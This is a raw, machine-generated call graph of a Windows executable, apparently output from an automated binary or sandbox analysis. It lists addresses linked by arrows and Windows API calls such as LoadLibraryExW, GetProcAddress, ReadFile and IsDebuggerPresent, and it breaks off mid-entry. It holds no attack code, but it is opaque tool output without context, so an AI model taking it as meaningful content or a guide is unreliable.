98831->98786 98832->98798 98834 2c1692 98833->98834 98837 2c16ba 98833->98837 98835 2d0fe6 59 API calls 98834->98835 98834->98837 98838 2c176f 98835->98838 98836 2d0fe6 59 API calls 98836->98838 98837->98808 98838->98836 98839->98809 98841 2c18b4 98840->98841 98842 2c1c7e 59 API calls 98841->98842 98843 2c18c5 98841->98843 98844 2ff4f1 98842->98844 98843->98818 98851 2b6de9 98845->98851 98848 3365e2 timeGetTime 98848->98415 98852 2b523c 59 API calls 98851->98852 98853 2b6e03 98852->98853 98854 2ef40f 98853->98854 98855 2b6e0d 98853->98855 98856 2c1821 59 API calls 98854->98856 98857 2b4d37 84 API calls 98855->98857 98858 2ef41f 98856->98858 98859 2b6e1a 98857->98859 98858->98858 98860 2c1c9c 59 API calls 98859->98860 98861 2b6e28 98860->98861 98861->98848 98862 2b502b 59 API calls 98861->98862 98862->98848 98866 2d02df 98863->98866 98864 2d02e7 98864->98423 98866->98864 98869 322db2 InternetCloseHandle InternetCloseHandle WaitForSingleObject 98866->98869 98867->98423 98868->98423 98869->98866 98870->98437 98871->98437 98872->98463 98873->98459 98875 32a918 98874->98875 98880 32a970 98874->98880 98876 2d0fe6 59 API calls 98875->98876 98878 32a93a 98876->98878 98877 2d0fe6 59 API calls 98877->98878 98878->98877 98878->98880 98906 30715b 59 API calls 98878->98906 98880->98486 98882 3178ac 98881->98882 98884 3178e3 98881->98884 98883 2d0fe6 59 API calls 98882->98883 98882->98884 98883->98884 98885 306ebc 98884->98885 98886 306f06 98885->98886 98890 306f1c 98885->98890 98887 2c1a36 59 API calls 98886->98887 98887->98890 98888 306f47 98891 32c355 275 API calls 98888->98891 98889 306f5a 98892 2ba820 275 API calls 98889->98892 98890->98888 98890->98889 98897 306f53 98891->98897 98895 306f91 98892->98895 98894 307002 98894->98513 98896 306fdc 98895->98896 98895->98897 98899 306fc1 98895->98899 98896->98897 98912 31a48d 89 API calls 98896->98912 98913 306cf1 59 API calls 98897->98913 98907 30706d 98899->98907 98901->98513 98902->98496 98903->98501 98904->98514 98905->98518 98906->98878 98908 307085 98907->98908 98914 32495b 98908->98914 98923 32f1b2 98908->98923 98909 3070d9 98909->98897 98912->98897 98913->98894 98915 2d0fe6 59 API calls 98914->98915 98916 32496c 98915->98916 98928 2c433f 98916->98928 98919 2b4d37 84 API calls 98920 32498d GetEnvironmentVariableW 98919->98920 98931 317a51 59 API calls 98920->98931 98922 3249aa 98922->98909 98924 2b4d37 84 API calls 98923->98924 98925 32f1cf 98924->98925 98926 314148 66 API calls 98925->98926 98927 32f1de 98926->98927 98927->98909 98929 2d0fe6 59 API calls 98928->98929 98930 2c4351 98929->98930 98930->98919 98931->98922 98933 314d09 98932->98933 98937 314cf0 98932->98937 98940 2d37c3 59 API calls 98933->98940 98935 314d0f 98935->98524 98937->98933 98937->98935 98939 2d385c GetStringTypeW 98937->98939 98938->98524 98939->98937 98940->98935 98943 2b3b3f 98941->98943 98948 2b3b67 98941->98948 98942 2b3b4d 98945 2b3b53 98942->98945 98946 2b3b31 59 API calls 98942->98946 98943->98942 98944 2b3b31 59 API calls 98943->98944 98944->98942 98947 2b5190 59 API calls 98945->98947 98945->98948 98946->98945 98947->98948 98948->98314 98949->98311 98950->98324 98951 2d7e83 98952 2d7e8f 98951->98952 98988 2da038 GetStartupInfoW 98952->98988 98955 2d7e94 98990 2d8dac GetProcessHeap 98955->98990 98956 2d7eec 98957 2d7ef7 98956->98957 99076 2d7fd3 58 API calls 98956->99076 98991 2d9d16 98957->98991 98960 2d7efd 98961 2d7f08 98960->98961 99077 2d7fd3 58 API calls 98960->99077 99012 2dd802 98961->99012 98964 2d7f17 98965 2d7f23 GetCommandLineW 98964->98965 99078 2d7fd3 58 API calls 98964->99078 99031 2e5153 GetEnvironmentStringsW 98965->99031 98968 2d7f22 98968->98965 98971 2d7f3d 98972 2d7f48 98971->98972 99079 2d32e5 58 API calls 98971->99079 99041 2e4f88 98972->99041 98975 2d7f4e 98976 2d7f59 98975->98976 99080 2d32e5 58 API calls 98975->99080 99055 2d331f 98976->99055 98979 2d7f61 98980 2d7f6c 98979->98980 99081 2d32e5 58 API calls 98979->99081 99061 2c5f8b 98980->99061 98983 2d7f80 98984 2d7f8f 98983->98984 99073 2d3588 98983->99073 99082 2d3310 58 API calls 98984->99082 98987 2d7f94 98989 2da04e 98988->98989 98989->98955 98990->98956 99083 2d33b7 36 API calls 98991->99083 98993 2d9d1b 99084 2d9f6c InitializeCriticalSectionAndSpinCount 98993->99084 98995 2d9d20 98996 2d9d24 98995->98996 99086 2d9fba TlsAlloc 98995->99086 99085 2d9d8c 61 API calls 98996->99085 98999 2d9d29 98999->98960 99000 2d9d36 99000->98996 99001 2d9d41 99000->99001 99087 2d8a05 99001->99087 99004 2d9d83 99095 2d9d8c 61 API calls 99004->99095 99007 2d9d88 99007->98960 99008 2d9d62 99008->99004 99009 2d9d68 99008->99009 99094 2d9c63 58 API calls 99009->99094 99011 2d9d70 GetCurrentThreadId 99011->98960 99013 2dd80e 99012->99013 99014 2d9e3b 58 API calls 99013->99014 99015 2dd815 99014->99015 99016 2d8a05 58 API calls 99015->99016 99018 2dd826 99016->99018 99017 2dd891 GetStartupInfoW 99025 2dd8a6 99017->99025 99028 2dd9d5 99017->99028 99018->99017 99019 2dd831 99018->99019 99019->98964 99020 2dda9d 99109 2ddaad LeaveCriticalSection 99020->99109 99022 2d8a05 58 API calls 99022->99025 99023 2dda22 GetStdHandle 99023->99028 99024 2dda35 GetFileType 99024->99028 99025->99022 99027 2dd8f4 99025->99027 99025->99028 99026 2dd928 GetFileType 99026->99027 99027->99026 99027->99028 99107 2da05b InitializeCriticalSectionAndSpinCount 99027->99107 99028->99020 99028->99023 99028->99024 99108 2da05b InitializeCriticalSectionAndSpinCount 99028->99108 99032 2d7f33 99031->99032 99033 2e5164 99031->99033 99037 2e4d4b GetModuleFileNameW 99032->99037 99110 2d8a4d 58 API calls 99033->99110 99035 2e518a 99036 2e51a0 FreeEnvironmentStringsW 99035->99036 99036->99032 99038 2e4d7f 99037->99038 99040 2e4dbf 99038->99040 99111 2d8a4d 58 API calls 99038->99111 99040->98971 99042 2e4fa1 99041->99042 99046 2e4f99 99041->99046 99043 2d8a05 58 API calls 99042->99043 99051 2e4fca 99043->99051 99044 2e5021 99045 2d2f85 58 API calls 99044->99045 99045->99046 99046->98975 99047 2d8a05 58 API calls 99047->99051 99048 2e5046 99049 2d2f85 58 API calls 99048->99049 99049->99046 99051->99044 99051->99046 99051->99047 99051->99048 99052 2e505d 99051->99052 99112 2e4837 58 API calls 99051->99112 99113 2d8ff6 IsProcessorFeaturePresent 99052->99113 99054 2e5069 99054->98975 99057 2d332b 99055->99057 99136 2da701 99057->99136 99058 2d3349 99059 2d2f70 67 API calls 99058->99059 99060 2d3368 99058->99060 99059->99060 99060->98979 99062 2c5fa5 99061->99062 99072 2c6044 99061->99072 99063 2c5fdf IsThemeActive 99062->99063 99139 2d359c 99063->99139 99067 2c600b 99151 2c5f00 SystemParametersInfoW SystemParametersInfoW 99067->99151 99069 2c6017 99152 2c5240 99069->99152 99071 2c601f SystemParametersInfoW 99071->99072 99072->98983 100230 2d3459 99073->100230 99075 2d3597 99075->98984 99076->98957 99077->98961 99078->98968 99082->98987 99083->98993 99084->98995 99085->98999 99086->99000 99090 2d8a0c 99087->99090 99089 2d8a47 99089->99004 99093 2da016 TlsSetValue 99089->99093 99090->99089 99091 2d8a2a 99090->99091 99096 2e5426 99090->99096 99091->99089 99091->99090 99104 2da362 Sleep 99091->99104 99093->99008 99094->99011 99095->99007 99097 2e5431 99096->99097 99101 2e544c 99096->99101 99098 2e543d 99097->99098 99097->99101 99105 2d8d58 58 API calls 99098->99105 99099 2e545c HeapAlloc 99099->99101 99102 2e5442 99099->99102 99101->99099 99101->99102 99106 2d35d1 DecodePointer 99101->99106 99102->99090 99104->99091 99105->99102 99106->99101 99107->99027 99108->99028 99109->99019 99110->99035 99111->99040 99112->99051 99114 2d9001 99113->99114 99119 2d8e89 99114->99119 99118 2d901c 99118->99054 99120 2d8ea3 99119->99120 99121 2d8ec3 IsDebuggerPresent 99120->99121 99127 2da385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99121->99127 99124 2d8faa 99126 2da370 GetCurrentProcess TerminateProcess 99124->99126 99125 2d8f87 99128 2dc826 99125->99128 99126->99118 99127->99125 99129 2dc82e 99128->99129 99130 2dc830 IsProcessorFeaturePresent 99128->99130 99129->99124 99132 2e5b3a 99130->99132 99135 2e5ae9 GetCurrentProcess TerminateProcess SetUnhandledExceptionFilter UnhandledExceptionFilter IsDebuggerPresent 99132->99135 99134 2e5c1d 99134->99124 99135->99134 99137 2da704 EncodePointer 99136->99137 99137->99137 99138 2da71e 99137->99138 99138->99058 99140 2d9e3b 58 API calls 99139->99140 99141 2d35a7 DecodePointer EncodePointer 99140->99141 99204 2d9fa5 LeaveCriticalSection 99141->99204 99143 2c6004 99144 2d3604 99143->99144 99145 2d360e 99144->99145 99146 2d3628 99144->99146 99145->99146 99205 2d8d58 58 API calls 99145->99205 99146->99067 99148 2d3618 99206 2d8fe6 9 API calls 99148->99206 99150 2d3623 99150->99067 99151->99069 99153 2c524d 99152->99153 99154 2c1207 59 API calls 99153->99154 99155 2c5258 GetCurrentDirectoryW 99154->99155 99207 2c4ec8 99155->99207 99157 2c527e IsDebuggerPresent 99158 2c528c 99157->99158 99159 300b21 MessageBoxA 99157->99159 99160 300b39 99158->99160 99161 2c52a0 99158->99161 99159->99160 99330 2c314d 59 API calls 99160->99330 99275 2c31bf 99161->99275 99164 300b49 99172 300b5f SetCurrentDirectoryW 99164->99172 99169 2c536c 99169->99071 99172->99169 99204->99143 99205->99148 99206->99150 99208 2c1207 59 API calls 99207->99208 99209 2c4ede 99208->99209 99339 2c5420 99209->99339 99211 2c4efc 99212 2c19e1 59 API calls 99211->99212 99213 2c4f10 99212->99213 99214 2c1c9c 59 API calls 99213->99214 99215 2c4f1b 99214->99215 99353 2b477a 99215->99353 99218 2c1a36 59 API calls 99219 2c4f34 99218->99219 99220 2b39be 68 API calls 99219->99220 99221 2c4f44 99220->99221 99222 2c1a36 59 API calls 99221->99222 99223 2c4f68 99222->99223 99224 2b39be 68 API calls 99223->99224 99225 2c4f77 99224->99225 99226 2c1207 59 API calls 99225->99226 99227 2c4f94 99226->99227 99356 2c55bc 99227->99356 99231 2c4fae 99232 300a54 99231->99232 99233 2c4fb8 99231->99233 99234 2c55bc 59 API calls 99232->99234 99235 2d312d 60 API calls 99233->99235 99236 300a68 99234->99236 99237 2c4fc3 99235->99237 99239 2c55bc 59 API calls 99236->99239 99237->99236 99238 2c4fcd 99237->99238 99240 2d312d 60 API calls 99238->99240 99241 300a84 99239->99241 99242 2c4fd8 99240->99242 99244 2d00cf 61 API calls 99241->99244 99242->99241 99243 2c4fe2 99242->99243 99245 2d312d 60 API calls 99243->99245 99246 300aa7 99244->99246 99247 2c4fed 99245->99247 99248 2c55bc 59 API calls 99246->99248 99249 2c4ff7 99247->99249 99264 300ad0 99247->99264 99251 300ab3 99248->99251 99252 2c501b 99249->99252 99255 2c1c9c 59 API calls 99249->99255 99250 2c55bc 59 API calls 99253 300aee 99250->99253 99254 2c1c9c 59 API calls 99251->99254 99257 2b47be 59 API calls 99252->99257 99258 2c1c9c 59 API calls 99253->99258 99259 300ac1 99254->99259 99256 2c500e 99255->99256 99261 2c55bc 59 API calls 99256->99261 99262 2c502a 99257->99262 99263 300afc 99258->99263 99260 2c55bc 59 API calls 99259->99260 99260->99264 99261->99252 99265 2b4540 59 API calls 99262->99265 99266 2c55bc 59 API calls 99263->99266 99264->99250 99267 2c5038 99265->99267 99268 300b0b 99266->99268 99372 2b43d0 99267->99372 99268->99268 99270 2b477a 59 API calls 99272 2c5055 99270->99272 99271 2b43d0 59 API calls 99271->99272 99272->99270 99272->99271 99273 2c55bc 59 API calls 99272->99273 99274 2c509b 99272->99274 99273->99272 99274->99157 99276 2c31cc 99275->99276 99277 300314 99276->99277 99278 2c31e5 99276->99278 99280 300330 GetOpenFileNameW 99277->99280 99279 2d0284 60 API calls 99278->99279 99281 2c31ee 99279->99281 99282 30037f 99280->99282 99391 2d09c5 99281->99391 99285 2c1821 59 API calls 99282->99285 99287 300394 99285->99287 99287->99287 99288 2c3203 99409 2c278a 99288->99409 99330->99164 99340 2c542d 99339->99340 99341 2c1821 59 API calls 99340->99341 99347 2c5590 99340->99347 99343 2c545f 99341->99343 99342 2c1609 59 API calls 99342->99343 99343->99342 99352 2c5495 99343->99352 99344 2c1609 59 API calls 99344->99352 99345 2c5563 99346 2c1a36 59 API calls 99345->99346 99345->99347 99348 2c5584 99346->99348 99347->99211 99350 2c4c94 59 API calls 99348->99350 99349 2c1a36 59 API calls 99349->99352 99350->99347 99352->99344 99352->99345 99352->99347 99352->99349 99381 2c4c94 99352->99381 99354 2d0fe6 59 API calls 99353->99354 99355 2b4787 99354->99355 99355->99218 99357 2c55df 99356->99357 99358 2c55c6 99356->99358 99360 2c1821 59 API calls 99357->99360 99359 2c1c9c 59 API calls 99358->99359 99361 2c4fa0 99359->99361 99360->99361 99362 2d312d 99361->99362 99363 2d31ae 99362->99363 99364 2d3139 99362->99364 99389 2d31c0 60 API calls 99363->99389 99366 2d315e 99364->99366 99387 2d8d58 58 API calls 99364->99387 99366->99231 99368 2d31bb 99368->99231 99369 2d3145 99388 2d8fe6 9 API calls 99369->99388 99371 2d3150 99371->99231 99373 2ed6c9 99372->99373 99377 2b43e7 99372->99377 99373->99377 99390 2b40cb 59 API calls 99373->99390 99375 2b44e8 99378 2d0fe6 59 API calls 99375->99378 99376 2b4530 99379 2b523c 59 API calls 99376->99379 99377->99375 99377->99376 99380 2b44ef 99377->99380 99378->99380 99379->99380 99380->99272 99382 2c4ca2 99381->99382 99386 2c4cc4 99381->99386 99384 2d0fe6 59 API calls 99382->99384 99383 2d0fe6 59 API calls 99385 2c4cd8 99383->99385 99384->99386 99385->99352 99386->99383 99387->99369 99388->99371 99389->99368 99390->99377 99392 2e1b70 99391->99392 99393 2d09d2 GetLongPathNameW 99392->99393 99394 2c1821 59 API calls 99393->99394 99395 2c31f7 99394->99395 99396 2c2f3d 99395->99396 99397 2c1207 59 API calls 99396->99397 99398 2c2f4f 99397->99398 99399 2d0284 60 API calls 99398->99399 99400 2c2f5a 99399->99400 99401 2c2f65 99400->99401 99407 300177 99400->99407 99402 2c4c94 59 API calls 99401->99402 99404 2c2f71 99402->99404 99443 2b1307 99404->99443 99406 300191 99407->99406 99449 2c151f 61 API calls 99407->99449 99408 2c2f84 99408->99288 99450 2c49c2 99409->99450 99412 2ff8d6 99567 319b16 99412->99567 99413 2c49c2 136 API calls 99415 2c27c3 99413->99415 99415->99412 99419 2c27cb 99415->99419 99417 2ff8eb 99616 2c4a2f 99417->99616 99418 2ff908 99421 2d0fe6 59 API calls 99418->99421 99422 2c27d7 99419->99422 99423 2ff8f3 99419->99423 99442 2ff94d 99421->99442 99474 2c29be 99422->99474 99622 3147e8 90 API calls 99423->99622 99426 2ff901 99426->99418 99428 2ffb01 99429 2d2f85 58 API calls 99428->99429 99430 2ffb09 99429->99430 99432 2ffb12 99436 2d2f85 58 API calls 99432->99436 99438 2c4a2f 84 API calls 99432->99438 99626 30ff5c 89 API calls 99432->99626 99436->99432 99438->99432 99439 2c1a36 59 API calls 99439->99442 99442->99428 99442->99432 99442->99439 99602 2c343f 99442->99602 99610 2c3297 99442->99610 99623 30fef8 59 API calls 99442->99623 99624 30fe19 61 API calls 99442->99624 99625 31793a 59 API calls 99442->99625 99444 2b1319 99443->99444 99448 2b1338 99443->99448 99446 2d0fe6 59 API calls 99444->99446 99445 2d0fe6 59 API calls 99447 2b134f 99445->99447 99446->99448 99447->99408 99448->99445 99449->99407 99627 2c4b29 99450->99627 99455 2c49ed LoadLibraryExW 99637 2c4ade 99455->99637 99456 3008bb 99458 2c4a2f 84 API calls 99456->99458 99460 3008c2 99458->99460 99462 2c4ade 3 API calls 99460->99462 99464 3008ca 99462->99464 99463 2c4a14 99463->99464 99465 2c4a20 99463->99465 99663 2c4ab2 99464->99663 99467 2c4a2f 84 API calls 99465->99467 99469 2c27af 99467->99469 99469->99412 99469->99413 99471 3008f1 99671 2c4a6e 99471->99671 99473 3008fe 99475 2ffd14 99474->99475 99476 2c29e7 99474->99476 100040 30ff5c 89 API calls 99475->100040 100028 2c3df7 60 API calls 99476->100028 99479 2ffd27 100041 30ff5c 89 API calls 99479->100041 99480 2c2a09 100029 2c3e47 67 API calls 99480->100029 99482 2c2a1e 99482->99479 99484 2c2a26 99482->99484 99486 2c1207 59 API calls 99484->99486 99485 2ffd43 99489 2c2a93 99485->99489 99491 2ffd56 99489->99491 99492 2c2aa1 99489->99492 99568 2c4a8c 85 API calls 99567->99568 99569 319b85 99568->99569 100051 319cf1 99569->100051 99572 2c4ab2 74 API calls 99573 319bb4 99572->99573 99574 2c4ab2 74 API calls 99573->99574 99575 319bc4 99574->99575 99576 2c4ab2 74 API calls 99575->99576 99599 2ff8e7 99599->99417 99599->99418 99603 2c34df 99602->99603 99606 2c3452 99602->99606 99605 2d0fe6 59 API calls 99603->99605 99604 2d0fe6 59 API calls 99605->99606 99606->99604 99611 2c32aa 99610->99611 99613 2c3358 99610->99613 99612 2d0fe6 59 API calls 99611->99612 99615 2c32dc 99611->99615 99612->99615 99613->99442 99615->99613 99617 2c4a39 99616->99617 99618 2c4a40 99616->99618 100058 2d55c6 99617->100058 99620 2c4a4f 99618->99620 99621 2c4a60 FreeLibrary 99618->99621 99620->99423 99621->99620 99622->99426 99623->99442 99624->99442 99625->99442 99626->99432 99676 2c4b77 99627->99676 99630 2c4b50 99632 2c49d4 99630->99632 99633 2c4b60 FreeLibrary 99630->99633 99631 2c4b77 2 API calls 99631->99630 99634 2d547b 99632->99634 99633->99632 99680 2d5490 99634->99680 99636 2c49e1 99636->99455 99636->99456 99761 2c4baa 99637->99761 99640 2c4b03 99642 2c4a05 99640->99642 99643 2c4b15 FreeLibrary 99640->99643 99641 2c4baa 2 API calls 99641->99640 99644 2c48b0 99642->99644 99643->99642 99645 2d0fe6 59 API calls 99644->99645 99646 2c48c5 99645->99646 99647 2c433f 59 API calls 99646->99647 99648 2c48d1 99647->99648 99649 2c490c 99648->99649 99651 30080a 99648->99651 99650 2c4a6e 69 API calls 99649->99650 99662 2c4915 99650->99662 99652 300817 99651->99652 99770 319ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99651->99770 99771 319f5e 95 API calls 99652->99771 99655 2c4ab2 74 API calls 99655->99662 99657 300859 99765 2c4a8c 99657->99765 99659 2c4a8c 85 API calls 99659->99662 99660 2c4ab2 74 API calls 99661 2c49a0 99660->99661 99661->99463 99662->99655 99662->99657 99662->99659 99662->99661 99664 300945 99663->99664 99665 2c4ac4 99663->99665 99877 2d5802 99665->99877 99668 3196c4 100002 31951a 99668->100002 99670 3196da 99670->99471 99672 2c4a7d 99671->99672 99673 300908 99671->99673 100007 2d5e80 99672->100007 99675 2c4a85 99675->99473 99677 2c4b44 99676->99677 99678 2c4b80 LoadLibraryA 99676->99678 99677->99630 99677->99631 99678->99677 99679 2c4b91 GetProcAddress 99678->99679 99679->99677 99681 2d549c 99680->99681 99682 2d54af 99681->99682 99685 2d54e0 99681->99685 99729 2d8d58 58 API calls 99682->99729 99684 2d54b4 99730 2d8fe6 9 API calls 99684->99730 99699 2e0718 99685->99699 99688 2d54e5 99689 2d54ee 99688->99689 99690 2d54fb 99688->99690 99731 2d8d58 58 API calls 99689->99731 99692 2d5525 99690->99692 99693 2d5505 99690->99693 99714 2e0837 99692->99714 99732 2d8d58 58 API calls 99693->99732 99698 2d54bf 99698->99636 99700 2e0724 99699->99700 99701 2d9e3b 58 API calls 99700->99701 99711 2e0732 99701->99711 99702 2e07ad 99739 2d8a4d 58 API calls 99702->99739 99705 2e0823 99705->99688 99706 2e07b4 99712 2e07a6 99706->99712 99740 2da05b InitializeCriticalSectionAndSpinCount 99706->99740 99707 2d9ec3 58 API calls 99707->99711 99710 2e07da EnterCriticalSection 99710->99712 99711->99702 99711->99707 99711->99712 99737 2d6e7d 59 API calls 99711->99737 99738 2d6ee7 LeaveCriticalSection LeaveCriticalSection 99711->99738 99734 2e082e 99712->99734 99723 2e0857 99714->99723 99715 2e0871 99745 2d8d58 58 API calls 99715->99745 99717 2e0a2c 99717->99715 99721 2e0a8f 99717->99721 99718 2e0876 99746 2d8fe6 9 API calls 99718->99746 99720 2d5530 99733 2d5552 LeaveCriticalSection LeaveCriticalSection 99720->99733 99742 2e87d1 99721->99742 99723->99715 99723->99717 99723->99723 99747 2d39fb 60 API calls 99723->99747 99725 2e0a25 99725->99717 99748 2d39fb 60 API calls 99725->99748 99727 2e0a44 99727->99717 99749 2d39fb 60 API calls 99727->99749 99729->99684 99730->99698 99731->99698 99732->99698 99733->99698 99741 2d9fa5 LeaveCriticalSection 99734->99741 99736 2e0835 99736->99705 99737->99711 99738->99711 99739->99706 99740->99710 99741->99736 99750 2e7fb5 99742->99750 99744 2e87ea 99744->99720 99745->99718 99746->99720 99747->99725 99748->99727 99749->99717 99751 2e7fc1 99750->99751 99752 2e7fd7 99751->99752 99754 2e800d 99751->99754 99753 2d8d58 58 API calls 99752->99753 99755 2e7fdc 99753->99755 99757 2e807e 109 API calls 99754->99757 99756 2d8fe6 9 API calls 99755->99756 99760 2e7fe6 99756->99760 99758 2e8029 99757->99758 99759 2e8052 LeaveCriticalSection 99758->99759 99759->99760 99760->99744 99762 2c4af7 99761->99762 99763 2c4bb3 LoadLibraryA 99761->99763 99762->99640 99762->99641 99763->99762 99764 2c4bc4 GetProcAddress 99763->99764 99764->99762 99766 300923 99765->99766 99767 2c4a9b 99765->99767 99772 2d5a6d 99767->99772 99769 2c4aa9 99769->99660 99770->99652 99771->99662 99774 2d5a79 99772->99774 99773 2d5a8b 99803 2d8d58 58 API calls 99773->99803 99774->99773 99776 2d5ab1 99774->99776 99785 2d6e3e 99776->99785 99778 2d5a90 99804 2d8fe6 9 API calls 99778->99804 99784 2d5a9b 99784->99769 99786 2d6e4e 99785->99786 99787 2d6e70 EnterCriticalSection 99785->99787 99786->99787 99788 2d6e56 99786->99788 99789 2d5ab7 99787->99789 99790 2d9e3b 58 API calls 99788->99790 99791 2d59de 99789->99791 99790->99789 99792 2d59fc 99791->99792 99793 2d59ec 99791->99793 99795 2d5a12 99792->99795 99806 2d5af0 99792->99806 99876 2d8d58 58 API calls 99793->99876 99835 2d4c5d 99795->99835 99796 2d59f1 99805 2d5ae8 LeaveCriticalSection LeaveCriticalSection 99796->99805 99801 2d5a53 99803->99778 99804->99784 99805->99784 99807 2d5afd 99806->99807 99808 2d5b2d 99807->99808 99809 2d5b15 99807->99809 99811 2d4906 58 API calls 99808->99811 99810 2d8d58 58 API calls 99809->99810 99812 2d5b1a 99810->99812 99813 2d5b35 99811->99813 99814 2d8fe6 9 API calls 99812->99814 99815 2e185f 64 API calls 99813->99815 99836 2d4c94 99835->99836 99837 2d4c70 99835->99837 99841 2d4906 99836->99841 99837->99836 99838 2d4906 58 API calls 99837->99838 99839 2d4c8d 99838->99839 99842 2d4925 99841->99842 99843 2d4910 99841->99843 99842->99801 99844 2d8d58 58 API calls 99843->99844 99876->99796 99880 2d581d 99877->99880 99879 2c4ad5 99879->99668 99881 2d5829 99880->99881 99882 2d5864 99881->99882 99883 2d586c 99881->99883 99884 2d583f 99881->99884 99882->99879 99885 2d6e3e 59 API calls 99883->99885 99907 2d8d58 58 API calls 99884->99907 99887 2d5872 99885->99887 99893 2d563d 99887->99893 99888 2d5859 99908 2d8fe6 9 API calls 99888->99908 99894 2d5673 99893->99894 99896 2d5658 99893->99896 99909 2d58a6 LeaveCriticalSection LeaveCriticalSection 99894->99909 99895 2d5663 99998 2d8d58 58 API calls 99895->99998 99896->99894 99896->99895 99901 2d56b3 99896->99901 99898 2d5668 99999 2d8fe6 9 API calls 99898->99999 99901->99894 99902 2d57c4 99901->99902 99903 2d4906 58 API calls 99901->99903 99910 2e108b 99901->99910 99978 2e0dd7 99901->99978 100000 2e0ef8 58 API calls 99901->100000 100001 2d8d58 58 API calls 99902->100001 99903->99901 99907->99888 99908->99882 99909->99882 99911 2e10ac 99910->99911 99912 2e10c3 99910->99912 99914 2d8d24 58 API calls 99911->99914 99913 2e17fb 99912->99913 99917 2e10fd 99912->99917 99915 2d8d24 58 API calls 99913->99915 99916 2e10b1 99914->99916 99918 2e1800 99915->99918 99919 2d8d58 58 API calls 99916->99919 99920 2e1105 99917->99920 99926 2e111c 99917->99926 99921 2d8d58 58 API calls 99918->99921 99958 2e10b8 99919->99958 99922 2d8d24 58 API calls 99920->99922 99923 2e1111 99921->99923 99924 2e110a 99922->99924 99925 2d8fe6 9 API calls 99923->99925 99929 2d8d58 58 API calls 99924->99929 99925->99958 99927 2e1131 99926->99927 99928 2e114b 99926->99928 99931 2e1169 99926->99931 99926->99958 99930 2d8d24 58 API calls 99927->99930 99928->99927 99933 2e1156 99928->99933 99929->99923 99930->99924 99932 2d8a4d 58 API calls 99931->99932 99934 2e1179 99932->99934 99935 2e5e9b 58 API calls 99933->99935 99937 2e119c 99934->99937 99938 2e1181 99934->99938 99936 2e126a 99935->99936 99939 2e12e3 ReadFile 99936->99939 99942 2e1280 GetConsoleMode 99936->99942 99940 2e1af1 60 API calls 99937->99940 99941 2d8d58 58 API calls 99938->99941 99943 2e1305 99939->99943 99944 2e17c3 GetLastError 99939->99944 99940->99933 99945 2e1186 99941->99945 99946 2e1294 99942->99946 99947 2e12e0 99942->99947 99943->99944 99951 2e12d5 99943->99951 99948 2e12c3 99944->99948 99949 2e17d0 99944->99949 99950 2d8d24 58 API calls 99945->99950 99946->99947 99953 2e129a ReadConsoleW 99946->99953 99947->99939 99956 2d8d37 58 API calls 99948->99956 99961 2e12c9 99948->99961 99952 2d8d58 58 API calls 99949->99952 99950->99958 99960 2e133a 99951->99960 99951->99961 99962 2e15a7 99951->99962 99954 2e17d5 99952->99954 99953->99951 99955 2e12bd GetLastError 99953->99955 99957 2d8d24 58 API calls 99954->99957 99955->99948 99956->99961 99957->99961 99958->99901 99959 2d2f85 58 API calls 99959->99958 99964 2e13a6 ReadFile 99960->99964 99970 2e1427 99960->99970 99961->99958 99961->99959 99962->99961 99965 2e16ad ReadFile 99962->99965 99966 2e13c7 GetLastError 99964->99966 99977 2e13d1 99964->99977 99969 2e16d0 GetLastError 99965->99969 99973 2e16de 99965->99973 99966->99977 99967 2e14d4 99969->99973 99970->99961 99970->99967 99971 2e14e4 99970->99971 99975 2e1494 MultiByteToWideChar 99970->99975 99972 2e1af1 60 API calls 99971->99972 99971->99975 99972->99975 99973->99962 99976 2e1af1 60 API calls 99973->99976 99974 2e1af1 60 API calls 99974->99977 99975->99955 99975->99961 99976->99973 99977->99960 99977->99974 99979 2e0de2 99978->99979 99983 2e0df7 99978->99983 99980 2d8d58 58 API calls 99979->99980 99981 2e0de7 99980->99981 99982 2d8fe6 9 API calls 99981->99982 99992 2e0df2 99982->99992 99984 2e0e2c 99983->99984 99985 2e6214 58 API calls 99983->99985 99983->99992 99986 2d4906 58 API calls 99984->99986 99985->99984 99987 2e0e40 99986->99987 99988 2e0f77 72 API calls 99987->99988 99989 2e0e47 99988->99989 99990 2d4906 58 API calls 99989->99990 99989->99992 99991 2e0e6a 99990->99991 99991->99992 99993 2d4906 58 API calls 99991->99993 99992->99901 99994 2e0e76 99993->99994 99994->99992 99995 2d4906 58 API calls 99994->99995 99996 2e0e83 99995->99996 99997 2d4906 58 API calls 99996->99997 99997->99992 99998->99898 99999->99894 100000->99901 100001->99898 100005 2d542a GetSystemTimeAsFileTime 100002->100005 100004 319529 100004->99670 100006 2d5458 100005->100006 100006->100004 100008 2d5e8c 100007->100008 100009 2d5e9e 100008->100009 100010 2d5eb3 100008->100010 100020 2d8d58 58 API calls 100009->100020 100011 2d6e3e 59 API calls 100010->100011 100013 2d5eb9 100011->100013 100016 2d5af0 67 API calls 100013->100016 100014 2d5ea3 100021 2d8fe6 9 API calls 100014->100021 100017 2d5ec4 100016->100017 100022 2d5ee4 LeaveCriticalSection LeaveCriticalSection 100017->100022 100019 2d5eae 100019->99675 100020->100014 100021->100019 100022->100019 100028->99480 100029->99482 100040->99479 100041->99485 100052 319d05 100051->100052 100053 2c4ab2 74 API calls 100052->100053 100054 3196c4 GetSystemTimeAsFileTime 100052->100054 100055 319b99 100052->100055 100056 2c4a8c 85 API calls 100052->100056 100053->100052 100054->100052 100055->99572 100055->99599 100056->100052 100231 2d3465 100230->100231 100232 2d9e3b 51 API calls 100231->100232 100233 2d346c 100232->100233 100235 2d349a DecodePointer 100233->100235 100239 2d3525 100233->100239 100236 2d34b1 DecodePointer 100235->100236 100235->100239 100240 2d34c1 100236->100240 100238 2d3582 100238->99075 100250 2d3573 100239->100250 100240->100239 100242 2d34ce EncodePointer 100240->100242 100245 2d34de DecodePointer EncodePointer 100240->100245 100242->100240 100243 2d356a 100244 2d32cf 3 API calls 100243->100244 100246 2d3573 100244->100246 100248 2d34f0 DecodePointer DecodePointer 100245->100248 100247 2d3580 100246->100247 100255 2d9fa5 LeaveCriticalSection 100246->100255 100247->99075 100248->100240 100251 2d3579 100250->100251 100252 2d3553 100250->100252 100256 2d9fa5 LeaveCriticalSection 100251->100256 100252->100238 100254 2d9fa5 LeaveCriticalSection 100252->100254 100254->100243 100255->100247 100256->100252 100257 2c4d83 100258 2c4dba 100257->100258 100259 2c4dd8 100258->100259 100260 2c4e37 100258->100260 100296 2c4e35 100258->100296 100261 2c4ead PostQuitMessage 100259->100261 100262 2c4de5 100259->100262 100264 2c4e3d 